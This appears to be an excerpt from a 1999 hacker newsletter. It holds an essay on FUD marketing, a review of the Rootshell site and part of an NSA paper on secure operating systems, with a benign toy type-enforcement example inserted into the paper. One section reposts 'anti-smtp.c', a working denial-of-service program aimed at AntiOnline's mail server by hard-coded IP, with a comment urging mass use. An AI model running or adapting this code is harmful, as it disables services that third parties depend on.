FUD is yet another method often employed by a party (typically a vendor in our context) to help propagate their product or service. In short, this is achieved by attempting to instill a sense of fear, uncertainty or doubt in the minds of consumers regarding a competitor's product. By instilling FUD in the minds of consumers, the vendor obliquely promises dire consequences if the intended target does not buy their goods. The obvious fallacy with this approach is that a vendor's product or service (P&S) is not sold on its own merit; rather it is sold as a "reasonable alternative". FUD's primary goal is to scare consumers away from using superior P&S in favor of inferior (yet often more recognized) P&S.

According to the New Hackers Dictionary (aka the Jargon file), FUD is defined as:

  FUD /fuhd/ n. Defined by Gene Amdahl after he left IBM to found his own company: "FUD is the fear, uncertainty, and doubt that IBM sales people instill in the minds of potential customers who might be considering [Amdahl] products." The idea, of course, was to persuade them to go with safe IBM gear rather than with competitors' equipment. This implicit coercion was traditionally accomplished by promising that Good Things would happen to people who stuck with IBM, but Dark Shadows loomed over the future of competitors' equipment or software. See IBM.
  After 1990 the term FUD was associated increasingly frequently with Microsoft, and has become generalized to refer to any kind of disinformation used as a competitive weapon. (1)

The past few years have brought a dramatic increase in the FUD tactic. Not only are large companies using it to help stifle new and upcoming competition, in addition, uneducated journalists are wielding it like a four year old with a loaded gun: unaware of the danger, or of the consequences.

The use of FUD in a marketing campaign is often subtle and hard to spot. Well written FUD will blend in among facts and be difficult to discern. Worse, this underhanded tactic is often problematic to counter. Rather than fighting against incorrect facts or misguided opinions, you find yourself battling vague assertions, self-serving maxims, and half-truths. Worse yet is spotting the FUD campaign in the first place. Because it is an effective weapon based on half-truths, distinguishing it from legitimate opinion may be difficult. For an excellent paper and well documented examples of this, consult the paper titled 'FUD 101'. (2) In this document, Mr. Green outlines several elements and examples of Microsoft using a FUD campaign against the Linux Community.

In today's world of articles and press releases, we can identify several levels of FUD. This is important as it tells us how to respond to the 'news'. The more FUD, the more skepticism that should be given to it. The less FUD, the better the chance it was just uneducated conclusions that led to the text.

Twelve Elements of FUD

To help newcomers to the world of FUD, I have come up with a list of twelve elements that can be and are used. In order to make this even easier for the consumer, I have devised a scale to help qualify the 'FUD level' used in a particular piece of writing. While this delineation is by no means an exact science, it can help put into perspective the subtle technique of disinformation.
a) Urgency

1) Buy our product now to avoid headache tomorrow!
While this may be appealing initially, this often comes at the sacrifice of features or performance. Yes, it may be easy to use, but odds are it does a third of what competitors' products do.

2) Buy our product now because tomorrow our product will kick ass!
The promise of future development (also known as 'vaporware') encourages you to purchase the product now in order to receive future upgrades that will be better than what is on the market now. Obviously, this does nothing but hurt you in the here and now.

b) Supporters

3) No quoted names.
In this world of technology professionals, it is easy to find someone who is a) qualified, b) supportive of the product and c) willing to go on the record. Any time an article comes out that claims a P&S is desired or supported but lacks names to back those claims, it should be questioned. Why couldn't they find at least one person to go on record endorsing the product?

4) Quoting known frauds and charlatans.
Worse than quoting no one is to quote frauds. Rather than not finding someone to endorse a P&S, they had to turn to someone that is well known for NOT knowing technology. These people will often go on the record endorsing anything if it propagates their name or company, or leads to them receiving some kind of incentive (read: cash).

c) Technical

5) Epiphany Nomenclature Significance Naught (3)
The use of large or fancy words in place of readily understood technical terms. Obscuring features behind words that sound impressive is a common way of hiding the truth. This technique is often known as 'buzzword compliance'.

6) Hyping up old or standard features in place of current or impressive technology.
We all use and trade email, so a company drooling over themselves in light of their amazing use of the SMTP (4) protocol means very little.

d) Harm

7) Without our P&S, you'll be hacked!
New security and crypto based companies are fond of using this ploy.
Without their products, you are a time bomb waiting to go off! Come tomorrow, evil and malicious hackers will intrude upon your network, deface your web page, read your corporate secrets and pour sand in your gas tank!

8) Without our P&S, you will not get future business!

The trend of business is moving toward our product and what we deem standardizations! If you and your company don't jump on our bandwagon, no other company will do business with you! As we all know, new technology and new standards are only adopted after long and rigorous testing. To move over to a new platform or protocol simply because some company says so is ludicrous.

9) Without our P&S, you will lose time and money!

This varies slightly from #2 in that the FUD centers around your company losing time and money today, not tomorrow. As we all know, any enterprise outfit that could possibly lose money in a matter of days without a specific product not already implemented is doomed to begin with.

e) Spin Doctoring (2)

10) Hyping opponent's weakness

No more than a form of mudslinging, the company doesn't rely on its own merit to persuade you to use its products. Rather, it must display its opponents' weaknesses and use them to convince you not to use theirs.

11) Creating weaknesses for the opponent

Sometimes an opponent has very few weaknesses. So, why not make some up? Clever wording and sometimes outright lies lead to one company creating supposed weaknesses in competitors' P&S.

12) Attacking opponent's strengths

Akin to #1, this relies on attacking the selling points of a competitor's P&S. Oftentimes, you will see this used in conjunction with #1 to attempt to completely belittle the opposing P&S.

For fun and amusement, you can use the twelve points above to rate articles. If an article or press release uses some of the methods above, attribute it one point per method. In the end, you can say that a given article has a "FUD Factor of 4" or is rated "7 on the FUD scale".
Recent months have shown Microsoft to be repeat offenders, often rating between 5 and 10 on the FUD Scale. Their fear of the Linux operating system shows. No one should ever rate higher than a 10, unless the article is made up of nothing but FUD.

Response to FUD

As with all problems, it does little good to discuss them without proposed solutions. With FUD, it is much more manageable and easy to deal with. The first thing is recognizing FUD in all its forms. Awareness for the average person is the tricky part. Consider the average person who has an interest in the ever changing world of technology and networking. They go day to day without the benefit of forums that readily challenge these huge companies oozing FUD at every crevice. Unfortunately, they are the bulk of the customers and supporters of these P&S. Educating them is the first step toward an honest profession.

Second is the response. Even if you do recognize a company peddling FUD, how do you respond? Very simple.

1) Mail the author of the FUD as well as their editor. When doing so, be polite and present facts to back your mail. Cite reference material, URLs or anything solid to back your argument and counter theirs.

2) Once mailed, give them a chance to correct their mistakes. Do not assume the FUD was intentional. The correction can come in the form of a retraction or followup article. As much as I hate to say it, the media machine may not allow for either. At that point, you must decide what to do.

3) Openly dispute the article in a public forum. Be it a mail list or web board, post the relevant parts of the article containing the FUD and refute them with your own facts. This causes a bit more strife but may be the only solution.

Fin

The use of Fear, Uncertainty, and Doubt in marketing campaigns -- while certain to get the public's attention -- is plainly wrong.
Armed with the above information, it's our hope that the reader will now be able to spot it, refute it, and most importantly, not buy into it.

Brian Martin
Copyright 1999 Brian Martin

References

(1) Entry for FUD in the Jargon File
(2) Eric Green (eric@linux-hw.com) for his paper 'FUD 101'. An excellent resource for real world examples and definitions. http://members.tripod.com/~e_l_green/fud101-4.html
(3) By using standard synonyms from www.dictionary.com, we can create an alternate phrase that sounds impressive, yet means nothing. Fancy -> Epiphany, Words -> Nomenclature, Meaning -> Significance, Nothing -> Naught. "Fancy words meaning nothing".
(4) SMTP stands for Simple Mail Transfer Protocol. The existing protocol that has been delivering your e-mail for over a decade.

Thanks

Space Rogue (spacerog@l0pht.com) for the idea of this paper and harassment.
ATTRITION Staff (staff@attrition.org) for peer review and harassment.
Anna Henricks, Geekgrl, and especially Jay Dyson for proof reading and suggestions.

@HWA

64.0 Crashing AntiOnline's SMTP server?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.innerpulse.com/

Crash AntiOnline SMTP Server?
Contributed by siko
Tuesday - August 10, 1999. 09:17PM UTC

An anonymous contributor submitted source code that is supposed to crash AntiOnline's SMTP/pop3 servers. This is unconfirmed and not supported by Innerpulse staff. (ditto for HWA staff =),- Ed)

anti-smtp.c

/*
 * This simple piece of code will exploit one of the many buffer overflow problems
 * with the SMTP/POP3 daemon software on the Antionline mail server, causing a denial of
 * service. I'm sure there are much more serious problems which could be caused,
 * if you know what I mean. Give this to everyone you know. Tell them to run it
 * over and over. Maybe that will convince JP to fix this, because it's been around
 * for months and months, and he's been notified of it more than once. I wish I
 * didn't have to do this.
 *
 * Cheers,
 *
 * -- jbx
 */

/* The header names were lost from the original listing; these are the ones
 * the code below uses. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char arg1[] = "vrfy ";
char *sendbuffer;

#define CHARACTERS_TO_SEND 475

int main(void)
{
    int thesocket;
    int counter = 0;
    struct sockaddr_in foonet;

    memset(&foonet, 0, sizeof(foonet));
    foonet.sin_port = htons(25);
    foonet.sin_family = AF_INET;
    foonet.sin_addr.s_addr = inet_addr("209.166.177.36");
    // foonet.sin_addr.s_addr = inet_addr("127.0.0.1");

    sendbuffer = (char *)malloc(1000);
    if (sendbuffer == NULL) {
        perror("malloc");
        exit(1);
    }

    if((thesocket = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("Error creating socket");
        exit(1);
    }

    printf("Connecting to the server...\n");

    if(connect(thesocket, (struct sockaddr *)&foonet, sizeof(struct sockaddr)) == -1) {
        if(errno == ECONNREFUSED) {
            printf("Connection refused. Most likely someone else has crashed it already.\n");
            exit(1);
        }
        perror("Unable to connect");
        exit(1);
    }

    /* build "vrfy " followed by CHARACTERS_TO_SEND x's and a CRLF */
    sprintf(sendbuffer, "%s", arg1);
    while(counter != CHARACTERS_TO_SEND) {
        strcat(sendbuffer, "x");
        counter++;
    }
    strcat(sendbuffer, "\r\n");

    write(thesocket, "helo localhost\r\n", 16);
    sleep(2);

    printf("Sending the string...\n");
    write(thesocket, sendbuffer, strlen(sendbuffer));

    close(thesocket);

    printf("Done. The service is now toast, and although it may still accept connections,\nit's not working.\n");
    return 0;
}

@HWA

65.0 Rootshell.com review
~~~~~~~~~~~~~~~~~~~~

http://www.techsightings.com/cgi-bin/ts_review.pl?52

Hackers and Crackers Go Mainstream
Wednesday - 26/Aug/1998
by Robin Miller

Since Rootshell went online in mid-1997, I thought of it as a premier hacker/cracker site where break-in exploits (with detailed scripts) got posted for use by others who enjoy this game. But as of August 1998, it's a "Network Security Information Site." I'm sure many professional network security people already read Rootshell at least once a week. More should. Despite its surface turnabout, it's still full of security bug findings, usually with detailed instructions on how to exploit them.
Indeed, several Pentagon officials have blamed Rootshell for some of the kid-type hack attempts made against some DoD sites in late 1997 and early 1998. But not everyone in our military establishment is braindead, and by the time the kiddies who follow Rootshell were trying the "Hack the Pentagon" scripts they found there, defenses had been erected -- and all their attempts failed.

Rootshell is platform-agnostic. Bug reports and security flaws listed here cover UNIX, Windows and NT, Mac, Linux, FreeBSD, Solaris, and everything else that pops up. There's a mailing list (outbound only, low volume) that keeps you up to date on new info and news, and is well worth subscribing to if you have any interest -- from either direction -- in computer and network security.

One last note: Rootshell, even in its new incarnation, still contains this disclaimer, and I'd personally appreciate it if you read and follow it. "By using this site you agree you will use the information on this site for lawful purposes only and will not use this information to gain unauthorized access. Information on this site is for educational purposes ONLY. If you do not agree with this, please leave now."

Check it out http://www.rootshell.com/

@HWA

66.0 The inevitability of failure.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

17 December 1998: Stephen Smalley notes: The slides and notes from our presentation at the NISSC for this paper are available at: http://www.cs.utah.edu/~sds/inevit-abs.html.

14 November 1998
Source: http://csrc.nist.gov/nissc/1998/proceedings/paperF1.pdf (62K)
Full list of NISSC 98 papers: http://csrc.nist.gov/nissc/1998/papers.html (Link fixed). Thanks to JM/RH.

The Inevitability of Failure: The Flawed Assumption of Security in Modern Computing Environments

Peter A. Loscocco, Stephen D. Smalley, Patrick A. Muckelbauer, Ruth C. Taylor, S. Jeff Turner, John F. Farrell
tos@epoch.ncsc.mil
National Security Agency

CONTENTS

Abstract
1 Introduction
2 The Missing Link
   Mandatory Security
   Trusted Path
3 General Examples
   3.1 Access Control
   3.2 Cryptography
4 Concrete Examples
   4.1 Mobile Code
   4.2 Kerberos
   4.3 Network Security Protocols
   4.4 Firewalls
5 System Security
6 Summary
7 References

[Contents added to original]

Abstract

Although public awareness of the need for security in computing systems is growing rapidly, current efforts to provide security are unlikely to succeed. Current security efforts suffer from the flawed assumption that adequate security can be provided in applications with the existing security mechanisms of mainstream operating systems. In reality, the need for secure operating systems is growing in today’s computing environment due to substantial increases in connectivity and data sharing. The goal of this paper is to motivate a renewed interest in secure operating systems so that future security efforts may build on a solid foundation. This paper identifies several secure operating system features which are lacking in mainstream operating systems, argues that these features are necessary to adequately protect general application-space security mechanisms, and provides concrete examples of how current security solutions are critically dependent on these features.

Keywords: secure operating systems, mandatory security, trusted path, Java, Kerberos, IPSEC, SSL, firewalls.

1 Introduction

Public awareness of the need for security in computing systems is growing as critical services are becoming increasingly dependent on interconnected computing systems. National infrastructure components such as the electric power, telecommunication and transportation systems can no longer function without networks of computers [50]. The advent of the World Wide Web has especially increased public concern for security.
Security is the primary concern of businesses which want to use the Internet for commerce and maintaining business relationships [24]. The increased awareness of the need for security has resulted in an increase of efforts to add security to computing environments. However, these efforts suffer from the flawed assumption that security can adequately be provided in application space without certain security features in the operating system. In reality, operating system security mechanisms play a critical role in supporting security at higher levels. This has been well understood for at least twenty five years [2][54][39], and continues to be reaffirmed in the literature [1][35]. Yet today, debate in the research community as to what role operating systems should play in secure systems persists [11]. The computer industry has not accepted the critical role of the operating system to security, as evidenced by the inadequacies of the basic protection mechanisms provided by current mainstream operating systems. The necessity of operating system security to overall system security is undeniable; the underlying operating system is responsible for protecting application-space mechanisms against tampering, bypassing, and spoofing attacks. If it fails to meet this responsibility, system-wide vulnerabilities will result. The need for secure operating systems is especially crucial in today’s computing environment. Substantial increases in connectivity and data sharing have increased the risk to systems such that even a careful and knowledgeable user running on a single-user system is no longer safe from the threat of malicious code. Because the distinction between data and code is vanishing, malicious code may be introduced, without a conscious decision on the part of a user to install executable code, whenever data is imported into the system. 
For example, malicious code could be introduced with a Java applet or by viewing apparently benign data that, in actuality, contains executable code [32][62]. More so than ever, secure operating systems are needed to protect against this threat.

The goal of this paper is to motivate a renewed interest in secure operating systems. By consolidating a number of well-documented examples from the literature, it argues that the threats posed by the modern computing environment cannot be addressed without support from secure operating systems and, as was stated in [8], that any security effort which ignores this fact can only result in a “fortress built upon sand.” Section 2 describes a set of secure operating system features which are typically lacking in mainstream operating systems but are crucial to information security. The need for these features is highlighted in section 3, which examines how application-space access control and cryptography cannot provide meaningful security without a secure operating system. Section 4 provides concrete examples of how security efforts rely on these operating system security features. Section 5 discusses the role of operating system security with respect to overall system security.

2 The Missing Link

This section identifies some features of secure operating systems which are necessary to protect application-space security mechanisms yet are lacking in mainstream operating systems. They form the “missing link” of security. Although this section only deals with features, it is important to note that features alone are inadequate. Assurance evidence must be provided to demonstrate that the features meet the desired system security properties and to demonstrate that the features are implemented correctly. Assurance is the ultimate missing link; although approaches to providing assurance may be controversial, the importance of assurance is undeniable.
The list of features in this section is not intended to be exhaustive; instead it is merely a small set of critical features that demonstrate the value of secure operating systems. A more complete discussion on secure operating systems, including discussions of assurance, can be found in [25], [59] or [20]. Subsequent sections argue the necessity of these features by describing how application-space security mechanisms and current security efforts employing them are vulnerable in their absence.

Mandatory security

The TCSEC [20] provides a narrow definition of mandatory security which is tightly coupled to the multi-level security policy of the Department of Defense. This has become the commonly understood definition for mandatory security. However, this definition is insufficient to meet the needs of either the Department of Defense or private industry as it ignores critical properties such as intransitivity and dynamic separation of duty [12][22]. This paper instead uses the more general notion of mandatory security defined in [59], in which a mandatory security policy is considered to be any security policy where the definition of the policy logic and the assignment of security attributes is tightly controlled by a system security policy administrator. Mandatory security can implement organization-wide security policies. Others have referred to this same concept as non-discretionary security in the context of role-based access control [22] and type enforcement [39][7][13].1

Likewise, as defined in [59], this paper uses a more general notion of discretionary security in which a discretionary security policy is considered to be any security policy where ordinary users may be involved in the definition of the policy functions and/or the assignment of security attributes.

___________________
1. Actually, long ago, the term non-discretionary controls was used for multi-level security as well [39].
Here discretionary security is not synonymous with identity based access control; IBAC, like any other security policy, may be either mandatory or discretionary[58]. An operating system’s mandatory security policy may be divided into several kinds of policies, such as an access control policy, an authentication usage policy, and a cryptographic usage policy. A mandatory access control policy specifies how subjects may access objects under the control of the operating system. A mandatory authentication usage policy specifies what authentication mechanisms must be used to authenticate a principal to the system. A mandatory cryptographic usage policy specifies what cryptographic mechanisms must be used to protect data. Additionally, various sub-systems of the operating system may have their own mechanism usage policies. These subsystem-specific usage policies may be dependent on the cryptographic usage policy. For example, a network usage policy for a router might specify that sensitive network traffic should be protected using IPSEC ESP [4] in tunneling mode prior to being sent to an external network. The selection of a cryptographic algorithm for IPSEC ESP may be deferred to the cryptographic usage policy. A secure system must provide a framework for defining the operating system’s mandatory security policy and translating it to a form interpretable by the underlying mandatory security mechanisms of the operating system. Without such a framework, there can be no real confidence that the mandatory security mechanisms will provide the desired security properties. An operating system which provides mandatory security may nonetheless suffer from the presence of high bandwidth covert channels. This is an issue whenever the mandatory security policy is concerned with confidentiality. This should not, however, be a reason to ignore mandatory security. 
Even with covert channels, an operating system with basic mandatory controls improves security by increasing the required sophistication of the adversary. Once systems with basic mandatory controls become mainstream, covert channel exploitation will become more common and public awareness of the need to address covert channels in computing systems will increase[57]. In any system which supports mandatory security, some applications require special privileges in the mandatory policy in order to perform some security-relevant function. Such applications are frequently called trusted applications because they are trusted to correctly perform some security-related function and because they are trusted to not misuse privileges required in order to perform that function. If the mandatory security mechanisms of a secure operating system only support coarse-grained privileges, then the security of the overall system may devolve to the security of the trusted applications on the system. To reduce the dependency on trusted applications, the mandatory security mechanisms of an operating system should be designed to support the principle of least privilege. Type enforcement is an example of a mandatory security mechanism which may be used both to limit trusted applications to the minimal set of privileges required for their function and to confine the damage caused by any misuse of these privileges [48][28]. The mandatory security mechanisms of an operating system may be used to support security-related functionality in applications by rigorously ensuring that subsystems are unbypassable and tamperproof. For example, type enforcement may be used to implement assured pipelines to provide these properties. An assured pipeline ensures that data flowing from a designated source to a designated destination must pass through a security-related subsystem and ensures the integrity of the subsystem. 
Many of the security requirements of these applications may be ensured by the underlying mandatory security mechanisms of the operating system [48].

Operating system mandatory security mechanisms may also be used to rigorously confine an application to a unique security domain that is strongly separated from other domains in the system. Applications may still misbehave, but the resulting damage can now be restricted to within a single security domain. This confinement property is critical to controlling data flows in support of a system security policy [33]. In addition to supporting the safe execution of untrustworthy software, confinement may support functional requirements, such as an isolated testing environment or an insulated development environment [48]. For example both the Sidewinder firewall and the DTE firewall use type enforcement for confinement [6][12].

Although one could attempt to enforce a mandatory security policy through discretionary security mechanisms, such mechanisms can not defend against careless or malicious users. Since discretionary security mechanisms place the burden for security on the individual users, carelessness by any one user at any point in time may lead to a violation of the mandatory policy. In contrast, mandatory security mechanisms limit the burden to the system security policy administrator. With only discretionary mechanisms, a malicious user with access to sensitive data and applications may directly release sensitive information in violation of the mandatory policy. Although that same user may also be able to leak sensitive information in ways that do not involve the computing system, the ability to leak the information through the computing system may increase the bandwidth of the leak and may decrease its traceability.
In contrast, with mandatory security mechanisms, he may only leak sensitive information through covert channels, which limits the bandwidth and increases accountability, if covert channels are audited.

Furthermore, even with users who are benign and careful, the mandatory security policy may still be subverted by flawed or malicious applications when only discretionary mechanisms are used to enforce it.2 The distinction between flawed and malicious software is not particularly important in this paper. In either case, an application may fail to apply security mechanisms required by the mandatory policy or may use security mechanisms in a way that is inconsistent with the user’s intent. Mandatory security mechanisms may be used to ensure that security mechanisms are applied as required and can protect the user against inadvertent execution of untrustworthy applications. Although the user may have carefully defined the discretionary policy to properly implement the mandatory policy, an application may change the discretionary policy without the user’s approval or knowledge. In contrast, the mandatory policy may only be changed by the system security policy administrator.

In the case of personal computing systems, where the user may be the system security policy administrator, mandatory security mechanisms are still helpful in protecting against flawed or malicious software. In the simplest case, where there is only a distinction between the user’s ordinary role and the user’s role as system security policy administrator, the mandatory security mechanisms can protect the user against unintentional execution of untrustworthy software. With a further sub-division of the user’s ordinary role into various roles based on function, mandatory security mechanisms can confine the damage that may be caused by flawed or malicious software.

_________________
2. A discussion of the formal limitations of discretionary security mechanisms appears in [29].
Although there are a number of commercial operating systems with support for mandatory security, none of these systems have become mainstream. These systems have suffered from a fixed notion of mandatory security, thereby limiting their market appeal. Furthermore, these systems typically lack adequate support for constraining trusted applications. In order to reach a wider market, operating systems must support a more general notion of mandatory security and must support flexible configuration of mandatory policies. Mainstream commercial operating systems rarely support the principle of least privilege even in their discretionary access control architecture. Many operating systems only provide a distinction between a completely privileged security domain and a completely unprivileged security domain. Even in Microsoft Windows NT, the privilege mechanism fails to adequately protect against malicious programs because it does not limit the privileges that a program inherits from the invoking process based on the trustworthiness of the program [65]. Current microkernel-based research operating systems have tended to focus on providing primitive protection mechanisms which may be used to flexibly construct a higher-level security architecture. Many of these systems, such as the Fluke microkernel [23] and the Exokernel [41], use kernel-managed capabilities as the underlying protection mechanism. However, as discussed in [59], typical capability architectures are inadequate for supporting mandatory access controls with a high degree of flexibility and assurance. L4 [38] provides some support for mandatory controls through its clans and chiefs mechanism and its IPC mechanism for identifying senders and receivers but still lacks a coherent framework for using these mechanisms to meet the requirements of a mandatory policy. Furthermore, L4 assumes that there will only be a small number of distinct security domains [38]. 
Flask [56], a variant of the Fluke microkernel, provides a mandatory security framework similar to that of DTOS [43], a variant of the Mach microkernel; both systems provide mechanisms for mandatory access control and a mandatory policy framework.

Trusted path

A trusted path is a mechanism by which a user may directly interact with trusted software, which can only be activated by either the user or the trusted software and may not be imitated by other software [20]. In the absence of a trusted path mechanism, malicious software may impersonate trusted software to the user or may impersonate the user to trusted software. Such malicious software could potentially obtain sensitive information, perform functions on behalf of the user in violation of the user’s intent, or trick the user into believing that a function has been invoked without actually invoking it. In addition to supporting trusted software in the base system, the trusted path mechanism should be extensible to support the subsequent addition of trusted applications by a system security policy administrator [28].

The concept of a trusted path can be generalized to include interactions beyond just those between trusted software and users. The TNI introduces the concept of a trusted channel for communication between trusted software on different network components [44]. More generally, a mechanism that guarantees a mutually authenticated channel, or protected path, is necessary to ensure that critical system functions are not being spoofed. Although a protected path mechanism for local communications could be constructed in application space without direct authentication support in the operating system, it is preferable for an operating system to provide its own protected path mechanism since such a mechanism will be simpler to assure [59] and is likely to be more efficient.
Most mainstream commercial operating systems are utterly lacking in their support for either a trusted path mechanism or a protected path mechanism. Microsoft Windows NT does provide a trusted path for a small set of functions such as login authentication and password changing but lacks support for extending the trusted path mechanism to other trusted applications [65]. For local communications, NT does provide servers with the identity of their clients; however, it does not provide the server identity to the client.

3 General Examples

This section argues that without operating system support for mandatory security and trusted path, application-space mechanisms for access control and cryptography cannot be implemented securely. These arguments will then be used to reinforce the discussion in section 4, which analyzes concrete examples.

3.1 Access Control

An application-space access control mechanism may be decomposed into an enforcer component and a decider component. When a subject attempts to access an object protected by the mechanism, the enforcer component must invoke the decider component, supplying it with the proper input parameters for the policy decision, and must enforce the returned decision. A common example of the required input parameters is the security attributes of the subject and the object. The decider component may also consult other external sources in order to make the policy decision. For example, it may use an external policy database and system information such as the current time. If a malicious agent can tamper with any of the components in the access control mechanism or with any inputs to the decision, then the malicious agent can subvert the access control mechanism. Even if the components and all of the inputs are collocated within a single file, the operating system security mechanisms are still relied upon to protect the integrity of that file.
As discussed in the prior section, only mandatory security mechanisms can rigorously provide such integrity guarantees. Even with strong integrity guarantees for the policy decision inputs, if an authorized user invokes malicious software, the malicious software could change an object’s security attributes or the policy database’s rules without the user’s knowledge or consent. The access control mechanism requires a trusted path mechanism in the operating system in order to ensure that arbitrary propagation of access cannot occur without explicit authorization by a user.

If a malicious agent can impersonate the decider component to the enforcer component, or if a malicious agent can impersonate any source of inputs to the decision, then the malicious agent can subvert the mechanism. If any of the components or external decision input sources are not collocated within a single application, then the access control mechanism requires a protected path mechanism. If a malicious agent can bypass the enforcer component, then it may trivially subvert the access control mechanism. Mandatory security mechanisms in the operating system may be used to ensure that all accesses to the protected objects are mediated by the enforcer component.

3.2 Cryptography

An analysis of application-space cryptography may be decomposed into an analysis of the invocation of the cryptographic mechanism and an analysis of the cryptographic mechanism itself. The analysis of this section draws from the discussions in [51][15] [60][61][55][52]. As an initial basis for discussion, suppose that the cryptographic mechanism is a hardware token that implements the necessary cryptographic functions correctly and that there is a secure means by which the cryptographic keys are established in the token.
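Two pieces of the paper fit together in one small model: the type enforcement and assured pipeline discussion in section 2 (data from a source must pass through a security subsystem before reaching its destination) and the enforcer/decider decomposition of section 3.1 just above. The C program below is an added illustration written for this reprint, not code from the paper, Sidewinder, DTE or any other system it cites. The domains (USER_D, FILTER_D, NET_D), the types (UNSCANNED_T, SCANNED_T) and the policy table are all invented for the example. It shows a decider whose only inputs are the two security labels, an enforcer that every access must go through, a policy-level check that no type lets the user domain hand data straight to the network domain, and a run of the pipeline in which the direct read is refused and the filtered one succeeds.

```c
#include <stdio.h>
#include <string.h>

/* Toy type-enforcement policy. Domains label subjects, types label objects;
 * every name here is constructed for this example. */
enum domain { USER_D, FILTER_D, NET_D, NDOMAINS };
enum type   { UNSCANNED_T, SCANNED_T, NTYPES };
enum { PERM_READ = 1, PERM_WRITE = 2 };

/* Domain Definition Table, set by the (hypothetical) policy administrator.
 * It is const and no function below lets a domain edit it: the policy is
 * mandatory, not discretionary. */
static const unsigned char ddt[NDOMAINS][NTYPES] = {
    [USER_D]   = { [UNSCANNED_T] = PERM_READ | PERM_WRITE },
    [FILTER_D] = { [UNSCANNED_T] = PERM_READ, [SCANNED_T] = PERM_WRITE },
    [NET_D]    = { [SCANNED_T]   = PERM_READ },
};

/* Decider: policy logic whose only inputs are the security attributes. */
int te_decide(enum domain d, enum type t, unsigned perm)
{
    if ((unsigned)d >= NDOMAINS || (unsigned)t >= NTYPES)
        return 0;                            /* unknown label: deny */
    return (ddt[d][t] & perm) == perm;
}

struct object { enum type t; char data[64]; };

/* Enforcer: the only path to an object's contents in this model. It consults
 * the decider and performs the access only on an allow. Returns 1 if performed. */
int access_object(enum domain d, struct object *o, unsigned perm,
                  const char *in, char *out, size_t outlen)
{
    if (!te_decide(d, o->t, perm))
        return 0;
    if (perm == PERM_WRITE)
        snprintf(o->data, sizeof o->data, "%s", in);
    else if (perm == PERM_READ)
        snprintf(out, outlen, "%s", o->data);
    else
        return 0;
    return 1;
}

/* Policy-level check: is there any type that src may write and dst may read? */
int can_flow_directly(enum domain src, enum domain dst)
{
    for (int t = 0; t < NTYPES; t++)
        if (te_decide(src, (enum type)t, PERM_WRITE) &&
            te_decide(dst, (enum type)t, PERM_READ))
            return 1;
    return 0;
}

/* Runs data through user -> filter -> network and checks that the network
 * domain only obtains it after the filter has relabelled it.
 * Returns 1 if the pipeline held, 0 if any step misbehaved. */
int demo_pipeline(char *netbuf, size_t n)
{
    struct object inbox  = { UNSCANNED_T, "" };
    struct object outbox = { SCANNED_T,   "" };
    char tmp[64], scanned[80];

    if (!access_object(USER_D, &inbox, PERM_WRITE, "mail body from user", NULL, 0))
        return 0;
    /* a direct read by the network domain would bypass the filter: must be refused */
    if (access_object(NET_D, &inbox, PERM_READ, NULL, netbuf, n))
        return 0;
    if (!access_object(FILTER_D, &inbox, PERM_READ, NULL, tmp, sizeof tmp))
        return 0;
    snprintf(scanned, sizeof scanned, "[scanned] %s", tmp);  /* stand-in for the filter's work */
    if (!access_object(FILTER_D, &outbox, PERM_WRITE, scanned, NULL, 0))
        return 0;
    return access_object(NET_D, &outbox, PERM_READ, NULL, netbuf, n);
}

int demo_pipeline_ok(void)
{
    char buf[80];
    return demo_pipeline(buf, sizeof buf) &&
           strcmp(buf, "[scanned] mail body from user") == 0;
}

int main(void)
{
    printf("user -> net directly: %s\n",
           can_flow_directly(USER_D, NET_D) ? "allowed" : "denied");
    printf("user -> filter -> net: %s\n", demo_pipeline_ok() ? "ok" : "FAILED");
    return 0;
}
```

The point the model makes concrete is the one the paper keeps returning to: the pipeline is only assured because the enforcer cannot be bypassed (there is no other way to reach `data`) and the table cannot be rewritten by a subject (it is not theirs to edit). In a real system those two properties are exactly what the operating system's mandatory mechanisms have to supply; an application-space version of this code could be bypassed with a plain file read.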
Even in this simplified case, where the confidentiality and integrity of algorithms and keys is achieved without operating system support, this section will demonstrate that there are still vulnerabilities which may only be effectively addressed with the features of a secure operating system.

One vulnerability in this simplified case is that invocation of the token cannot be guaranteed. Any legitimate attempt to use the token might not result in a call to the token. The application that performs the cryptographic invocation might be bypassed or modified by malicious applications or malicious users. Malicious applications might impersonate the cryptographic token to the invoking application. Mandatory security and protected path features in the operating system address this vulnerability. Mandatory security mechanisms may be used to ensure that the application that invokes the cryptographic token is unbypassable and tamperproof against both malicious software and malicious users. Unbypassability could also be achieved by using an inline cryptographic token, which is physically interposed between the sender of the data to be protected and the receiver of the protected data; however, this would be less flexible. A protected path mechanism may be used to ensure that malicious software cannot impersonate the cryptographic token to the invoking application.

Misuse of the cryptographic token is a second vulnerability in the simplified case. Misuse may involve the use of a service, algorithm, session or key by an unauthorized application. Without operating system support for identifying callers, a cryptographic token can do little more than require that a user activate it, after which, any service, algorithm, session or key authorized for that user may be used by any application on the system.
In this case, the cryptographic token may be misused by applications operating on behalf of other users or may be misused by malicious software operating on behalf of the authorized user. Furthermore, unless the cryptographic token has a direct physical interface for user activation, malicious software can spoof the token to the user, obtain authentication information, and subsequently activate the cryptographic token without the user’s knowledge or consent. Even with a direct physical interface to the user, it is impractical for the cryptographic token to require user confirmation for every cryptographic operation. This second vulnerability may be addressed through mandatory security, trusted path and protected path features in the operating system. A trusted path mechanism obviates the need for a separate physical interface for activation. A protected path mechanism permits the cryptographic token to identify its callers and enforce fine-grained controls over the use of services, algorithms, sessions and keys. As an alternative to having the token deal with fine-grained controls over its usage, mandatory security mechanisms may also be used to provide such controls. For example, mandatory security mechanisms may be used to isolate the token for use only by applications executed by the user who activated the token. Furthermore, the mandatory security mechanisms can reduce the risk of malicious software being able to use the cryptographic token and may consequently limit the use of the trusted path mechanism to highly sensitive actions. Hence, even in the simplest case, the features of a secure operating system are crucial to addressing the vulnerabilities of application-space cryptography. In the remainder of this section, the assumptions of the simplified case are removed, and the additional vulnerabilities are examined. 
